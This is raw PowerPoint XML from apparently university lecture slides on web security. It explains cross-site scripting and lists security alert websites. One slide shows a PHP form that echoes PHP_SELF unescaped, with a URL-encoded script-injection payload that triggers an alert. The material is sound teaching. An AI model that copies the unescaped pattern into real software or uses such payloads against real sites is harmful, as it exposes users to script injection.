              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Due to breaches of browser security, XSS enables attackers to inject client-side script into Web pages viewed by other users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>originally XSS referred to the act of loading the attacked, third-party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The definition gradually expanded to encompass other modes of code injection, including persistent and non-JavaScript vectors (including Java, ActiveX, VBScript, Flash, or even pure HTML, and SQL Queries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>There are two types of XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>non-persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>) cross-site scripting vulnerability is by far the most common type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>) XSS occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553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330EBA7-E7C0-42EC-8EC3-C9928750249D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203"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a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example of Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56322" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8763000" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>XSS enables attackers to inject client-side script into web pages viewed by others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>if the programmer writes the PHP code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;form method=</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post</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 action=</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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> echo $_SERVER[</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PHP_SELF</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];?&gt;</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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>If a user enters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.example.com/test_form.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The above is translated into &lt;form method=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>test_form.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&gt; which is fine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>However if the user enters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.example.com/test_form.php/%22%3ECscript%3Ealert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>hacked’)%3C/script%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The above code translates it into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;form method=</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post</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 action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>test_form.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>/</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&gt;&lt;script&gt;alert(</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hacked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a: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0C8D29A-A4C1-42FC-96FB-CDEFF0B3EB07}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B05020201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dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Cyberspace Security Alert Status</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1638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286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45A00DC-8CF4-4C4E-8F32-624C332E37B7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="4041775" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Go to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://thornton.info/tools/inetsecstat.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Includes links to: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Internet Storm Center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Homeland Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Symantec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>ThreatCon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>ISS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>AlertCon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>CA Security Advisor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>World Port Scan Map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Virus Radar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>McAfee Threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Norman Virus Warnings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Brings together a list of security websites detailing current threats on the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28677" name="Picture 4"/>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4800600" y="1468438"/>
            <a:ext cx="3873500" cy="3235325"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="64998"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28678" name="TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="4876800"/>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b="1">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Alert Status links</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28679" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1143000"/>
            <a:ext cx="1454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Homeland security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28679" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6137275" y="1419225"/>
            <a:ext cx="339725" cy="5619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681" name="TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="1219200"/>
            <a:ext cx="1603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Internet storm center</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28681" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687888" y="1495425"/>
            <a:ext cx="493712" cy="5619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683" name="TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="5029200"/>
            <a:ext cx="1411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World Port Center</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28683" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7239000" y="4495800"/>
            <a:ext cx="325438"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cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Cross-site Scripting (XSS) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Reducing the Threat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
